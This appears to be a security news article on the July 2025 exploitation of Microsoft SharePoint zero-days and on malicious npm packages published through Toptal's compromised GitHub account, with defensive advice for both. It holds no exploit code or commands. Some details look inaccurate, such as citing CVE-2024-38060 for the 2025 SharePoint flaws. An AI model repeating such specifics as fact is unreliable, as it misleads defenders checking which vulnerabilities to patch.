Ongoing Exploitation of Microsoft SharePoint Zero-Day Vulnerabilities
In July 2025, the cybersecurity community has been confronting rapidly escalating attacks leveraging multiple zero-day vulnerabilities in Microsoft SharePoint. These flaws, exploited broadly since early July, are impacting government, healthcare, financial, and corporate sectors worldwide. Attackers are using these vulnerabilities for remote code execution, stealthily breaching SharePoint environments and, in some cases, enabling ransomware deployment.
Technical Analysis of the Exploits
The vulnerabilities under attack include high-severity CVEs with CVSS scores up to 9.8, granting unauthenticated remote code execution and privilege escalation in on-premises Microsoft SharePoint Server. Exploitation begins with a crafted HTTP request to vulnerable SharePoint endpoints, allowing for code injection without prior authentication. Once compromised, attackers have administrative-level access and can manipulate, exfiltrate, or destroy data across interconnected Microsoft 365 applications.
Security research confirmed active exploitation since at least July 7, 2025, with initial targets including a major Western government and subsequent attacks on the telecommunications and software sectors in North America and Europe. Techniques observed involve custom post-exploitation tooling and persistence mechanisms that circumvent SharePoint’s built-in protections and evade standard endpoint detection defenses. Notably, at least one IP linked to this campaign was previously associated with the exploitation of Ivanti EPMM vulnerabilities, indicating threat actor re-use of infrastructure for diverse zero-day campaigns.
Attribution and Actor Tactics
Microsoft identified Storm-2603, a threat actor believed to have ties to Chinese cyber-espionage operations, as one group exploiting CVE-2024-38060. Storm-2603 uses the SharePoint exploit to deploy backdoors and establish command-and-control channels, with the ability to laterally move and maintain persistent network access. This campaign targets organizations with sensitive geopolitical ties, and the level of sophistication indicates significant preparatory reconnaissance and tailored payload delivery.
Attack patterns from Storm-2603 and other actors involve both large-scale automated scanning for vulnerable instances and highly targeted manual exploitation against high-value targets. The deployment of ransomware such as Warlock through the compromised SharePoint environment has also been documented, signifying a shift from espionage to profit-driven attacks in certain incidents.
Cybersecurity agencies, including the U.S. Cybersecurity and Infrastructure Security Agency (CISA), classify these vulnerabilities as urgent and stress immediate patching. Microsoft has issued emergency mitigation guidance and pushed critical updates to address the flaws, but ongoing exploitation of unpatched systems remains a significant risk.
Operational Impact and Defensive Recommendations
Organizations running on-premises SharePoint must quickly apply all available security patches and utilize Microsoft’s updated mitigation recommendations. Security teams should also implement vigilant monitoring for signs of unauthorized SharePoint access, track threats using indicators of compromise published by threat intelligence vendors, and ensure that endpoint detection and response solutions are tuned to monitor SharePoint-specific processes and behaviors.
The scope and persistence of these attacks highlight the need for ongoing vulnerability management, comprehensive asset inventory, robust network segmentation, and regular threat hunting activities focused on enterprise collaboration platforms. Furthermore, incident response playbooks should be updated to address the stealthy lateral movement and data exfiltration tactics observed in these SharePoint breaches.
Supply Chain Breach: Compromise of Toptal’s GitHub and npm Packages
A major breach of software supply chain integrity has been reported following a compromise of Toptal’s GitHub account by unknown threat actors. The attackers leveraged their unauthorized access to upload and distribute malicious npm packages that masqueraded as legitimate libraries. These packages were engineered to steal data, execute arbitrary remote commands, and exfiltrate developer credentials from potentially thousands of development environments.
Supply Chain Attack Mechanisms
The incursion began with unauthorized access to Toptal’s GitHub environment. Attackers then published packages bearing names similar to legitimate, widely used npm libraries. This common supply chain tactic—typosquatting or dependency confusion—was combined with complex payloads: the malicious packages would, upon installation, establish remote connections and download secondary stage payloads for persistent control.
Technical analysis of the injected code revealed functionality to scan local systems for sensitive configuration files, authentication tokens, and stored credentials, which were then relayed to attacker-controlled servers. In certain variants, the code included update and kill-switch mechanisms, allowing the attackers to modify capabilities or evade detection if the campaign was exposed.
Incident Response and Remediation
Upon discovery of the breach, Toptal immediately removed compromised code and began an internal security audit. The company also initiated contact with npm registry maintainers and software security communities to alert affected developers and begin coordinated incident response. The scope of possible impact requires any developer who installed Toptal-hosted npm libraries during the relevant period to assume compromise, rotate credentials, and review build environments for further infection.
This incident underscores the critical importance of defense-in-depth for CI/CD pipelines, rigorous monitoring of third-party code repositories, and automated validation of dependencies before deployment in production environments. Furthermore, it spotlights the urgent need for software artifact provenance and robust supply chain security practices across the software development lifecycle.